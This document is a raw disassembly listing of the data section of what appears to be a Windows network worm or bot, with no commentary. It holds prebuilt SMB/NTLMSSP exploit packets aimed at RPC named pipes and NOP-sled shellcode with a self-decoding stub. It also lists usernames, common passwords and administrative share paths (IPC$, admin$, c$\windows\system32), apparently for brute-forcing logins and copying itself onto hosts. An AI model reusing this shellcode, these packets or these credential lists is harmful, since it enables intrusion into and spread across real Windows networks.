dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41B168 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410C8E�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_41B1A8 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410CCB�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 0
dword_41B20C dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00410D0B�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_41B2B0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410D68�o
dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_41B338 dd 0 ; DATA XREF: .text:00410E19�o
dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 4
dd 2 dup(0)
dword_41B35C dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: .text:00410E9A�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_41B3E4 dd 0 ; DATA XREF: .text:00410F30�o
dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_41B408 dd 20804h, 0 ; DATA XREF: .text:00410DD7�o
; .text:00410DED�o ...
dword_41B410 dd 2080Ah, 0 ; DATA XREF: .text:00410DC1�o
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_1:
unicode 0, <Windows 2000 2195>,0
aWindows20005_2:
unicode 0, <Windows 2000 5.0>,0
align 4
dd 0
dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: .data:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: .data:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: .data:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: .data:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: .data:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: .data:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: .data:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: .data:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: .data:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: .data:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: .data:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: .data:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 ; DATA XREF: sub_410F60+A3�r
db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC_0 ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DE30
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: .data:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: .data:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: .data:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: .data:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: .data:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: .data:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .data:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: .data:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .data:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: .data:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: .data:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .data:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: .data:0041BE00�o
aSex db 'sex',0 ; DATA XREF: .data:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: .data:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: .data:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: .data:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: .data:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: .data:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: .data:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: .data:0041D790�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_2:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: .data:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: .data:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: .data:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE_0 db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: .data:0041BCD0�o
align 4
aC_0 db 'c$',0 ; DATA XREF: .data:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0041BCC4�o
; .data:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .data:0041BCC0�o
; .data:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: .data:0041BCB8�o
; .data:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: .text:00416ACA�o
; .text:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: .data:0041BC24�o
; .data:0041BE78�o
aSam db 'sam',0 ; DATA XREF: .data:0041BC20�o
; .data:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: .data:0041BC1C�o
; .data:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: .data:0041BC18�o
; .data:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: .data:0041BC14�o
; .data:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: .data:0041BC10�o
; .data:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: .data:0041BC0C�o
; .data:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: .data:0041BC08�o
; .data:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: .data:0041BC04�o
; .data:0041BE58�o
aJen db 'jen',0 ; DATA XREF: .data:0041BC00�o
; .data:0041BE54�o
aBob db 'bob',0 ; DATA XREF: .data:0041BBFC�o
; .data:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0041BBF8�o
; .data:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: .data:0041BBF4�o
; .data:0041BE1C�o
aUser db 'user',0 ; DATA XREF: .data:0041BBF0�o
; .data:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:0041BBEC�o
; .data:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: .data:0041BBE8�o
; .data:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: .data:0041BBE4�o
; .data:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: .data:0041BBE0�o
; .data:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: .data:0041BBDC�o
; .data:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: .data:0041BBD8�o
; .data:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: .data:0041BBD4�o
; .data:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:0041BBCC�o
; .data:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:0041BBC8�o
; .data:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0041BBC4�o
; .data:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: .data:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: .data:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0041BBAC�o
; .data:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:0041BBA8�o
; .data:0041BD10�o
align 4
